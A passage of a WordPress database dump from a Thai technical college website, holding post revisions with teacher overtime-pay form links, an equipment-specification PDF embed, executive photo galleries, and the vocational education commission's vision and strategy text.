(1080, 4, '2018-02-13 19:06:15', '2018-02-13 12:06:15', '<hr />\r\n\r\n<a href=\"https://drive.google.com/file/d/11wsqrbvPT25iO4w5nF9vciT98jsWejZ1/view?usp=sharing\">ตัวอย่างใบเบิกค่าสอนเกินภาระงานสำหรับ ครูสอน ปวช.ล้วน</a>\r\n\r\n<hr />\r\n\r\n<a href=\"https://drive.google.com/file/d/13DeyicD3Kkg2n5kHsQYu9jrbo5yf0Rz2/view?usp=sharing\">ตัวอย่างใบเบิกค่าสอนเกินภาระงานสำหรับ ครูสอน ปวส.ล้วน </a>\r\n\r\n<hr />\r\n\r\n<a href=\"https://drive.google.com/file/d/18glBwDAdpRtBe3E-cVBJz6Qst21ZDPZ-/view?usp=sharing\">ตัวอย่างใบเบิกค่าสอนเกินภาระงานสำหรับ ครูสอน 2ระดับ NEW</a>\r\n\r\n<hr />\r\n\r\n ', 'เอกสารสำหรับครูผู้สอน', '', 'inherit', 'closed', 'closed', '', '1033-revision-v1', '', '', '2018-02-13 19:06:15', '2018-02-13 12:06:15', '', 1033, 'http://www.technicrayong.ac.th/1033-revision-v1/', 0, 'revision', '', 0),
(1081, 4, '2018-02-13 19:39:00', '2018-02-13 12:39:00', '<hr />\r\n\r\n<a href=\"https://drive.google.com/file/d/11wsqrbvPT25iO4w5nF9vciT98jsWejZ1/view?usp=sharing\">ตัวอย่างใบเบิกค่าสอนเกินภาระงานสำหรับ ครูสอน ปวช.ล้วน</a>\r\n\r\n<hr />\r\n\r\n<a href=\"https://drive.google.com/file/d/1wTDrgsPlh82AcfVNYRly08zVxCUcj3y9/view?usp=sharing\">ตัวอย่างใบเบิกค่าสอนเกินภาระงานสำหรับ ครูสอน ปวส.ล้วน</a> NEW\r\n\r\n<hr />\r\n\r\n<a href=\"https://drive.google.com/file/d/18glBwDAdpRtBe3E-cVBJz6Qst21ZDPZ-/view?usp=sharing\">ตัวอย่างใบเบิกค่าสอนเกินภาระงานสำหรับ ครูสอน 2ระดับ NEW</a>\r\n\r\n<hr />\r\n\r\n ', 'เอกสารสำหรับครูผู้สอน', '', 'inherit', 'closed', 'closed', '', '1033-revision-v1', '', '', '2018-02-13 19:39:00', '2018-02-13 12:39:00', '', 1033, 'http://www.technicrayong.ac.th/1033-revision-v1/', 0, 'revision', '', 0),
(1082, 3, '2018-02-14 12:54:07', '2018-02-14 05:54:07', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2FDetail-of-durable-articles-.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประชาพิจารณ์รายละเอียดร่างคุณลักษณะเฉพาะครุภัณฑ์ จำนวน 3 รายการ ประจำปีงบประมาณ 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%9e%e0%b8%b4%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b9%8c%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%a5%e0%b8%b0%e0%b9%80%e0%b8%ad%e0%b8%b5%e0%b8%a2%e0%b8%94', '', '', '2018-02-14 12:54:58', '2018-02-14 05:54:58', '', 0, 'http://www.technicrayong.ac.th/?p=1082', 465, 'post', '', 0),
(1083, 3, '2018-02-14 12:51:21', '2018-02-14 05:51:21', '', 'Detail of durable articles', '', 'inherit', 'closed', 'closed', '', 'detail-of-durable-articles', '', '', '2018-02-14 12:51:21', '2018-02-14 05:51:21', '', 1082, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/Detail-of-durable-articles-.pdf', 0, 'attachment', 'application/pdf', 0),
(1084, 3, '2018-02-14 12:52:11', '2018-02-14 05:52:11', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2FDetail-of-durable-articles-.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประชาพิจารณ์รายละเอียดร่างคุณลักษณะเฉพาะครุภัณฑ์ จำนวน 3 รายการ ประจำปีงบประมาณ 2561', '', 'inherit', 'closed', 'closed', '', '1082-revision-v1', '', '', '2018-02-14 12:52:11', '2018-02-14 05:52:11', '', 1082, 'http://www.technicrayong.ac.th/1082-revision-v1/', 0, 'revision', '', 0),
(1086, 3, '2018-02-15 12:43:41', '2018-02-15 05:43:41', '<img class=\"aligncenter wp-image-978\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-21-55-274x300.jpg\" alt=\"\" width=\"250\" height=\"273\" /> <img class=\"aligncenter wp-image-985 \" src=\"/wp-content/uploads/2018/02/6-2-2561-10-50-51-1-300x73.jpg\" alt=\"\" width=\"284\" height=\"69\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-979 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-32-17-271x300.jpg\" alt=\"\" width=\"250\" height=\"277\" /> <img class=\"wp-image-980 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-33-14-270x300.jpg\" alt=\"\" width=\"250\" height=\"278\" />\r\n\r\n<img class=\"wp-image-988 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-09-15-300x73.jpg\" alt=\"\" width=\"287\" height=\"70\" /> <img class=\"alignnone wp-image-989\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-12-19.jpg\" alt=\"\" width=\"315\" height=\"69\" />\r\n\r\n<img class=\"wp-image-981 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-34-02-272x300.jpg\" alt=\"\" width=\"250\" height=\"276\" />\r\n\r\n<img class=\"alignnone wp-image-991\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-17-16.jpg\" alt=\"\" width=\"345\" height=\"70\" /> <img class=\"alignnone wp-image-990\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-15-12.jpg\" alt=\"\" width=\"318\" height=\"70\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'คณะผู้บริหารวิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '982-revision-v1', '', '', '2018-02-15 12:43:41', '2018-02-15 05:43:41', '', 982, 'http://www.technicrayong.ac.th/982-revision-v1/', 0, 'revision', '', 0),
(1087, 3, '2018-02-15 13:01:03', '2018-02-15 06:01:03', '<img class=\"aligncenter wp-image-978\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-21-55-274x300.jpg\" alt=\"\" width=\"250\" height=\"273\" /> <img class=\"aligncenter wp-image-985 \" src=\"/wp-content/uploads/2018/02/6-2-2561-10-50-51-1-300x73.jpg\" alt=\"\" width=\"284\" height=\"69\" />\r\n\r\n<img class=\"wp-image-980 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-33-14-270x300.jpg\" alt=\"\" width=\"250\" height=\"278\" /> <img class=\"wp-image-979 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-32-17-271x300.jpg\" alt=\"\" width=\"250\" height=\"277\" />\r\n\r\n<img class=\"size-medium wp-image-989 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-12-19-300x66.jpg\" alt=\"\" width=\"300\" height=\"66\" /> <img class=\"wp-image-988 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-09-15-300x73.jpg\" alt=\"\" width=\"254\" height=\"62\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"wp-image-981 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-34-02-272x300.jpg\" alt=\"\" width=\"250\" height=\"276\" />\r\n\r\n<img class=\"wp-image-991 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-17-16.jpg\" alt=\"\" width=\"345\" height=\"70\" /> <img class=\"alignnone wp-image-990\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-15-12.jpg\" alt=\"\" width=\"318\" height=\"70\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'คณะผู้บริหารวิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '982-revision-v1', '', '', '2018-02-15 13:01:03', '2018-02-15 06:01:03', '', 982, 'http://www.technicrayong.ac.th/982-revision-v1/', 0, 'revision', '', 0),
(1088, 3, '2018-02-15 13:04:47', '2018-02-15 06:04:47', '<img class=\"aligncenter wp-image-978\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-21-55-274x300.jpg\" alt=\"\" width=\"250\" height=\"273\" /> <img class=\"aligncenter wp-image-985 \" src=\"/wp-content/uploads/2018/02/6-2-2561-10-50-51-1-300x73.jpg\" alt=\"\" width=\"284\" height=\"69\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-980 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-33-14-270x300.jpg\" alt=\"\" width=\"250\" height=\"278\" /> <img class=\"wp-image-979 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-32-17-271x300.jpg\" alt=\"\" width=\"250\" height=\"277\" />\r\n\r\n<img class=\" wp-image-989 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-12-19-300x66.jpg\" alt=\"\" width=\"355\" height=\"78\" /> <img class=\"wp-image-988 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-09-15-300x73.jpg\" alt=\"\" width=\"315\" height=\"77\" />\r\n\r\n<img class=\"wp-image-981 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-34-02-272x300.jpg\" alt=\"\" width=\"250\" height=\"276\" />\r\n\r\n<img class=\"wp-image-991 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-17-16.jpg\" alt=\"\" width=\"394\" height=\"80\" /> <img class=\"alignnone wp-image-990\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-15-12.jpg\" alt=\"\" width=\"368\" height=\"81\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'คณะผู้บริหารวิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '982-revision-v1', '', '', '2018-02-15 13:04:47', '2018-02-15 06:04:47', '', 982, 'http://www.technicrayong.ac.th/982-revision-v1/', 0, 'revision', '', 0),
(1089, 3, '2018-02-15 13:18:58', '2018-02-15 06:18:58', '<span style=\"color: #ffffff;\">-------------------------------------------------------------------------------------</span><img class=\"wp-image-978 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-21-55-274x300.jpg\" alt=\"\" width=\"250\" height=\"273\" />\r\n\r\n<span style=\"color: #ffffff;\">-------------------------------------------------------------------------------</span><img class=\"wp-image-985 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-50-51-1-300x73.jpg\" alt=\"\" width=\"304\" height=\"74\" />\r\n\r\n \r\n\r\n<span style=\"color: #ffffff;\">-------------------------------------------</span><img class=\"wp-image-980 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-33-14-270x300.jpg\" alt=\"\" width=\"250\" height=\"278\" /> <img class=\"wp-image-979 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-32-17-271x300.jpg\" alt=\"\" width=\"250\" height=\"277\" />\r\n\r\n<span style=\"color: #ffffff;\">----------------------------</span><img class=\" wp-image-989 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-12-19-300x66.jpg\" alt=\"\" width=\"355\" height=\"78\" /> <img class=\"wp-image-988 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-09-15-300x73.jpg\" alt=\"\" width=\"299\" height=\"73\" />\r\n\r\n<span style=\"color: #ffffff;\">-----------------------------------------</span><img class=\"wp-image-981 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-34-02-272x300.jpg\" alt=\"\" width=\"250\" height=\"276\" />\r\n\r\n<span style=\"color: #ffffff;\">---------------------</span><img class=\"wp-image-991 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-17-16.jpg\" alt=\"\" width=\"394\" height=\"80\" /><img class=\"wp-image-990 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-15-12.jpg\" alt=\"\" width=\"368\" height=\"81\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'คณะผู้บริหารวิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '982-revision-v1', '', '', '2018-02-15 13:18:58', '2018-02-15 06:18:58', '', 982, 'http://www.technicrayong.ac.th/982-revision-v1/', 0, 'revision', '', 0),
(1090, 3, '2018-02-15 13:22:09', '2018-02-15 06:22:09', '<span style=\"color: #ffffff;\">-----------------------------------------------------------------------------------------</span><img class=\"wp-image-978 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-21-55-274x300.jpg\" alt=\"\" width=\"250\" height=\"273\" />\r\n\r\n<span style=\"color: #ffffff;\">------------------------------------------------------------------------------------</span><img class=\"wp-image-985 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-50-51-1-300x73.jpg\" alt=\"\" width=\"304\" height=\"74\" />\r\n\r\n \r\n\r\n<span style=\"color: #ffffff;\">-------------------------------------------</span><img class=\"wp-image-980 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-33-14-270x300.jpg\" alt=\"\" width=\"250\" height=\"278\" /> <img class=\"wp-image-979 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-32-17-271x300.jpg\" alt=\"\" width=\"250\" height=\"277\" />\r\n\r\n<span style=\"color: #ffffff;\">----------------------------</span><img class=\" wp-image-989 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-12-19-300x66.jpg\" alt=\"\" width=\"355\" height=\"78\" /> <img class=\"wp-image-988 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-09-15-300x73.jpg\" alt=\"\" width=\"299\" height=\"73\" />\r\n\r\n<span style=\"color: #ffffff;\">-----------------------------------------</span><img class=\"wp-image-981 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-34-02-272x300.jpg\" alt=\"\" width=\"250\" height=\"276\" />\r\n\r\n<span style=\"color: #ffffff;\">---------------------</span><img class=\"wp-image-991 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-17-16.jpg\" alt=\"\" width=\"394\" height=\"80\" /><img class=\"wp-image-990 alignnone\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-15-12.jpg\" alt=\"\" width=\"368\" height=\"81\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'คณะผู้บริหารวิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '982-revision-v1', '', '', '2018-02-15 13:22:09', '2018-02-15 06:22:09', '', 982, 'http://www.technicrayong.ac.th/982-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1091, 3, '2018-02-15 16:21:31', '2018-02-15 09:21:31', '<img class=\"aligncenter wp-image-1092 size-full\" src=\"/wp-content/uploads/2018/02/15-2-2561-16-21-21.jpg\" alt=\"\" width=\"835\" height=\"623\" />\r\n\r\n \r\n<h3><strong>สำนักงานคณะกรรมการการอาชีวศึกษา</strong></h3>\r\n<h4>สำนักงานคณะกรรมการการอาชีวศึกษาได้ดำเนินการในการผลิตและพัฒนากำลังคน เพื่อสนองตอบความต้องการกำลังคนในการพัฒนาประเทศ โดยในปี 2551 ได้สร้างภาพลักษณ์ที่ดีให้กับการอาชีวศึกษา เพื่อสร้างความนิยมในการเรียนวิชาชีพให้กับสังคม มีเป้าหมายเพื่อเพิ่มปริมาณผู้เรียน ในขณะเดียวกันได้ใช้กิจกรรมการบริการสังคมในโครงการและวาระพิเศษต่างๆเพื่อให้สังคมได้รับรู้ถึงศักยภาพของผู้เรียนอาชีวศึกษา และเป็นการสร้างประสบการณ์ให้กับผู้เรียนทั้งในด้านการฝึกงานวิชาชีพและปลูกฝังสำนึกการบริการสังคม นอกจากนี้ได้เน้นเครือข่ายความร่วมมือกับทุกภาคส่วนให้เข้ามาร่วมรับผิดชอบและมีบทบาทในการจัดการอาชีวศึกษาร่วมกันมากขึ้น ผลการดำเนินการดังกล่าวในปี 2551 ช่วยทำให้การอาชีวศึกษาเป็นที่รู้จักกับสังคมมากขึ้น และกลุ่มเป้าหมายต่างต้องการเข้าสู่ระบบอาชีวศึกษา ดังนั้นในปี2552 นี้ สำนักงานคณะกรรมการการอาชีวศึกษา จึงต้องการที่จะพัฒนาด้านคุณภาพให้เพิ่มขึ้นควบคู่ไปกับปริมาณผู้เรียน และขยายบทบาทการจัดการอาชีวศึกษาสำหรับผู้เรียนที่เป็นผู้มีงานทำแล้ว ผู้ที่ต้องการพัฒนาศักยภาพ และผู้ที่กำลังหางานทำให้มากขึ้น และให้ความสำคัญกับการค้นหา พัฒนา เผยแพร่ นวัตกรรม เทคโนโลยีเพื่อสร้าง และพัฒนาอาชีพให้เกิดประโยชน์ในเชิงพาณิชย์ จึงได้กำหนดแผนปฏิบัติราชการในปีงบประมาณ 2552 ไว้ดังนี้</h4>\r\n<h3></h3>\r\n<h3><strong>วิสัยทัศน์</strong></h3>\r\n<h4>สำนักงานคณะกรรมการการอาชีวศึกษา เป็นองค์กรหลักที่มุ่งมั่นผลิตและพัฒนากำลังคนอาชีวศึกษาให้มีคุณภาพและมาตรฐาน สอดคล้องกับการพัฒนาเศรษฐกิจและสังคม ส่งผลต่อการเพิ่มขีดความสามารถในการแข่งขันของประเทศ</h4>\r\n<h3></h3>\r\n<h3><strong>พันธกิจ </strong></h3>\r\n<h4>• จัดการอาชีวศึกษาและฝึกอบรมวิชาชีพให้มีคุณภาพมาตรฐาน</h4>\r\n<h4>• ขยายโอกาสทางการศึกษาวิชาชีพ อย่างทั่วถึงและเสมอภาค</h4>\r\n<h4>• วิจัย สร้างนวัตกรรม พัฒนาองค์ความรู้ เพื่อการพัฒนาอาชีพ</h4>\r\n<h4>ในการผลักดันให้วิสัยทัศน์และพันธกิจบรรลุตามเป้าหมายนั้น สำนักงานคณะกรรมการการอาชีวศึกษาได้กำหนดยุทธศาสตร์ไว้ 6 ยุทธศาสตร์ 35 กลยุทธ์ ดังนี้</h4>\r\n \r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 1 : การพัฒนาการจัดการอาชีวศึกษาและการฝึกอบรมวิชาชีพให้มีคุณภาพมาตรฐาน</span></strong></h3>\r\n<h4>สำนักงานคณะกรรมการการอาชีวศึกษามีภารกิจเกี่ยวกับการจัดการอาชีวศึกษาและการฝึกอบรมวิชาชีพโดยคำนึงถึงคุณธรรมและความเป็นเลิศทางวิชาชีพ การพัฒนาการจัดการอาชีวศึกษาและฝึกอบรมวิชาชีพ จะเน้นการผลิตกำลังคนให้มีคุณภาพมาตรฐาน มีเส้นทางอาชีพที่ชัดเจน เพื่อสนับสนุนขีดความสามารถในการแข่งขันของประเทศ ตลอดจนให้มีการรับรองสมรรถนะของบุคคลในการประกอบอาชีพ เสริมสร้างทักษะการเป็นผู้ประกอบการ และสร้างค่านิยมที่ดีต่อการอาชีวศึกษา โดยมีเป้าประสงค์ให้ผู้สำเร็จอาชีวศึกษาและการฝึกอบรมวิชาชีพมีคุณภาพ มาตรฐาน มีงานทำและดำรงชีวิตอย่างมีความสุขในสังคม โดยมีกลยุทธ์หลักคือ</h4>\r\n<h4>1. พัฒนาครูและบุคลากรอาชีวศึกษา</h4>\r\n<h4>2. เร่งรัดพัฒนาคุณภาพและสมรรถนะผู้เรียน</h4>\r\n<h4>3. สร้างมาตรฐานและพัฒนาหลักสูตร กระบวนการเรียนการสอน และการวัดและประเมินผล</h4>\r\n<h4>4. ส่งเสริมการประกันคุณภาพสถานศึกษา</h4>\r\n<h4>5. ส่งเสริมคุณธรรม จริยธรรม และจรรยาบรรณวิชาชีพ</h4>\r\n<h4>6. พัฒนาสถานศึกษาและสถาบันการอาชีวศึกษาให้ได้มาตรฐาน มีความเป็นเลิศทางวิชาชีพ</h4>\r\n<h4>7. สร้างเสริมประสบการณ์วิชาชีพ ปลูกจิตอาสา ด้วยการบริการสังคม</h4>\r\n<h4>8. ส่งเสริมให้นำเทคโนโลยีสารสนเทศ สื่อ นวัตกรรม มาใช้ในการเรียนการสอน เสริมสร้างทักษะการเป็นผู้ประกอบการ</h4>\r\n<h4>9. สร้างภาพลักษณ์ที่ดีต่อการอาชีวศึกษา</h4>\r\n \r\n<div>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 2 : สร้างเครือข่ายและส่งเสริมความร่วมมือ</span></strong></h3>\r\n<h4>การผลิตและพัฒนากำลังคนให้ตรงตามความต้องการของประเทศ ต้องได้รับร่วมมือกับองค์กรที่ต้องการใช้กำลังคน ตั้งแต่ภาคการผลิต เอกชน รัฐวิสาหกิจ และชุมชน เพื่อสร้างเครือข่ายความร่วมมือในการจัดการอาชีวศึกษาทั้งในและต่างประเทศ นำไปสู่การกำหนดหลักสูตร กระบวนการจัดการเรียนการสอนในการผลิตกกำลังคนได้ตรงกับความต้องการภาคการผลิตและความต้องการของผู้ใช้ โดยมีเป้าประสงค์ เพื่อผลิตและพัฒนากำลังคนสอดคล้องกับความต้องการของตลาดแรงงานและท้องถิ่น และมีกลยุทธ์ คือ</h4>\r\n<h4>1. ส่งเสริมและสนับสนุนความร่วมมือในการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพทั้งในและต่างประเทศ</h4>\r\n<h4>2. สร้างความเข้มแข็งในการสร้างเครือข่ายและความร่วมมือในการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพ</h4>\r\n<h4>3. พัฒนาฐานข้อมูลความร่วมมือ</h4>\r\n<h4>4. พัฒนาศูนย์กำลังคนอาชีวศึกษา</h4>\r\n<h4>5. ประสาน ส่งเสริมและสนับสนุน การจัดการอาชีวศึกษาและการฝึกอบรมวิชาชีพของสถานศึกษาเอกชน สถานประกอบการและเครือข่าย</h4>\r\n<h3></h3>\r\n<div>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 3: พัฒนาระบบบริหารจัดการอาชีวศึกษา</span></strong></h3>\r\n<h4>คุณภาพของการอาชีวศึกษา มีระบบการบริหารจัดการอาชีวศึกษาองค์ประกอบที่สำคัญที่สุดที่จะส่งผลต่อคุณภาพ การปฏิรูประบบราชการ พระราชกฤษฎีกาว่าด้วยหลักเกณฑ์และวิธีการบริหารกิจการบ้านเมืองที่ดี พ.ศ. 2546 และนำแนวทางการพัฒนาคุณภาพการบริหารจัดการภาครัฐ (Public Sector Management Quality Award : PMQA) ซี่งเป็นเครื่องมือในการพัฒนาองค์กรไปสู่ความเป็นเลิศ ในขณะที่กฎหมายการอาชีวศึกษาได้ระบุถึงการจัดตั้งสถาบันการอาชีวศึกษา ซึ่งต้องมีการพัฒนาระบบการบริหารและจัดการในรูปแบบสถาบันการอาชีวศึกษาควบคู่ไปด้วย อีกทั้งจากการประกาศใช้กฎหมายการอาชีวศึกษาดังกล่าว มีผลให้ต้องสร้างกฎหมาย กฎระเบียบ ต่างๆเพื่อนำไปสู่การปฏิบัติ</h4>\r\n<h4>ดังนั้นเพื่อให้การพัฒนาระบบบริหารและจัดการอาชีวศึกษาเป็นไปอย่างมีประสิทธิภาพ จึงได้กำหนดกลยุทธ์ไว้ดังนี้</h4>\r\n<h4>1. จัดและพัฒนาโครงสร้างการบริหารงานให้เป็นไปตาม ก.ม.การอาชีวศึกษาและก.ม.อื่นที่เกี่ยวข้อง</h4>\r\n<h4>2. พัฒนาระบบบริหารจัดการตามหลักเกณฑ์คุณภาพการบริหารจัดการภาครัฐและธรรมาภิบาล</h4>\r\n<h4>3. พัฒนากฎหมาย กฎ ระเบียบ ข้อบังคับ</h4>\r\n<h4>4. กระจายอำนาจการบริหารจัดการสู่สถานศึกษาและสถาบัน</h4>\r\n<h4>5. ผลักดันการจัดตั้งสถาบันการอาชีวศึกษา</h4>\r\n<h4>6. พัฒนาระบบติดตามและประเมินผลให้มีประสิทธิภาพ</h4>\r\n<h4>7. พัฒนาระบบการตรวจสอบภายในให้มีประสิทธิภาพ</h4>\r\n<h4>8. ส่งเสริมการนำเทคโนโลยีสารสนเทศเพื่อการบริหารจัดการและการให้บริการ</h4>\r\n<h4>9. เสริมสร้างสวัสดิการและขวัญกำลังใจ</h4>\r\n<h3></h3>\r\n<div>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 4 : ขยายโอกาสทางการศึกษาวิชาชีพและส่งเสริมการเรียนรู้ตลอดชีวิต</span></strong></h3>\r\n<h4>มุ่งเน้นการเพิ่มโอกาสทางการศึกษาวิชาชีพให้ประชาชนทุกคนมีโอกาสเข้าถึงการศึกษาด้านวิชาชีพที่มีคุณภาพมาตรฐานอย่างต่อเนื่องตลอดชีวิต ทั้งการศึกษาในระบบ</h4>\r\n<h4>การศึกษานอกระบบ และการศึกษาตามอัธยาศัย โดยมีจุดมุ่งหมายให้คลอบคลุมประชาชนทุกเพศทุกวัย และกลุ่มเป้าหมายทั้งเด็ก เยาวชน วัยแรงงาน สตรี ผู้สูงอายุ โดยเฉพาะผู้ยากไร้ ด้อยโอกาสคนพิการ ผู้ห่างไกลทุรกันดารและชนกลุ่มน้อย มีกลยุทธ์ดังนี้</h4>\r\n<h4>1. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพ ด้วยรูปแบบที่หลากหลายทั้งในระบบ นอกระบบ และทวิภาคี</h4>\r\n<h4>2. ส่งเสริมและพัฒนาอาชีพให้ประชาชนในการสร้างงานสร้างรายได้</h4>\r\n<h4>3. จัดการศึกษาวิชาชีพแก่ผู้ด้อยโอกาส คนพิการ ผู้สูงอายุ</h4>\r\n<h4>4. ส่งเสริมให้มีการสร้างรายได้ระหว่างเรียน</h4>\r\n<h4></h4>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 5 : จัดอาชีวศึกษาเพื่อสร้างเสริมความมั่นคงของรัฐ</span></strong></h3>\r\n<h4>ส่งเสริมการจัดการศึกษาในจังหวัดชายแดน ให้เป็นกลไกเสริมสร้างความสมานฉันท์ สันติวิธี วิถีประชาธิปไตย บนพื้นฐานความหลากหลายทางวัฒนธรรม และความเป็นอัตลักษณ์ของแต่ละพื้นที่ มีความร่วมมือระหว่างประเทศด้านการศึกษา แลกเปลี่ยนความรู้ พัฒนาวิชาการ/วิชาชีพ เตรียมความพร้อมรองรับการเปิดเสรีการค้าในอนาคต โดยหวังผลให้ประเทศไทยเป็นศูนย์กลางการศึกษาวิชาชีพในภูมิภาค โดยเฉพาะสาขาที่มีศักยภาพและความพร้อม ประกอบไปด้วยกลยุทธ์ ดังนี้</h4>\r\n<h4>1. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพในเขตชายแดนภาคใต้</h4>\r\n<h4>2. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพในพื้นที่ชายแดน และเขตพัฒนาพิเศษเฉพาะกิจ</h4>\r\n<h4>3. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพตามโครงการพระราชดำริ</h4>\r\n<h4>4. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาร่วมกับประเทศเพื่อนบ้านเพื่อสร้างความเข้าใจอันดี</h4>\r\n<h4></h4>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ ที่ 6 สนับสนุนการวิจัยและพัฒนาถ่ายทอดองค์ความรู้และเทคโนโลยี </span></strong></h3>\r\n<h4>เพื่อให้การอาชีวศึกษาเป็นองค์กรแห่งการเรียนรู้ ตั้งแต่การพัฒนาระบบการบริหารจัดการให้เอื้อต่อการเรียนรู้ การสร้างองค์ความรู้ และนวัตกรรมทางวิชาชีพ การเชื่อมโยงการวิจัยกับกระบวนการจัดการเรียนการสอนวิชาชีพ มีกลไกนำผลการวิจัยไปใช้ประโยชน์ได้จริง มีกลยุทธ์ ดังนี้</h4>\r\n<h4>1. ส่งเสริมพัฒนาการวิจัย สร้างนวัตกรรม สิ่งประดิษฐ์ และการวิจัยเชิงนโยบาย 